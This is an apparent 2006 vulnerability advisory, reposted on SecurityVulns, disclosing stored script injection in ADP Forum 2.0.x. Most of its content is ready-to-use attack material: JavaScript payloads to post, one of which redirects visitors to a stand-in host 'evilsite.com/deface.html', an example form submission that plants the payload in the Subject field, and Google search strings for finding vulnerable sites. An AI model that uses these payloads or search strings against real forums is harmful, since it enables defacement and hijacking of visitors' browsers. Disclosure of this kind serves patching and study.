ADP Forum 2.0,* script İnjection

2006-03-09T00:00:00
ID SECURITYVULNS:DOC:11751
Type securityvulns
Reporter Securityvulns
Modified 2006-03-09T00:00:00

Description

http://biyosecurity.be/bugs/adpforum2.html

ADP Forum 2.0,* script İnjection

site:http://www.linux.it/~fedro/ demo:http://www.adp.host.sk/Forum203/


Post This Code:

<script>alert(/Liz0ziM/)</script>

<script>location.href="http://evilsite.com/deface.html";</script>

vs..

Example Post Message :

Name :Liz0ziM Username :username Password :password E-mail :liz0@bsdmail.com Subject :<script>location.href="http://evilsite.com/deface.html";</script> Message :LOL :=)


Credit:Liz0ziM Mail :liz0@bsdmail.com Site :www.biyosecurity.com BiyoSecurityTeam: Liz0ziM,Codexploder'tq,r00t3rr0r,y3LL0w


google:

"ADP Forum 2.0.3 is powered by VzScripts" "ADP Forum 2.0.2" "ADP Forum 2.0.1" "ADP Forum 2.0"


Source:

http://www.blogcu.com/Liz0ziM/338614/

http://biyosecurity.be/bugs/adpforum2.html

http://biyosecurity.be/bugs/adpforum2.txt

--


Get your free email from http://mymail.bsdmail.com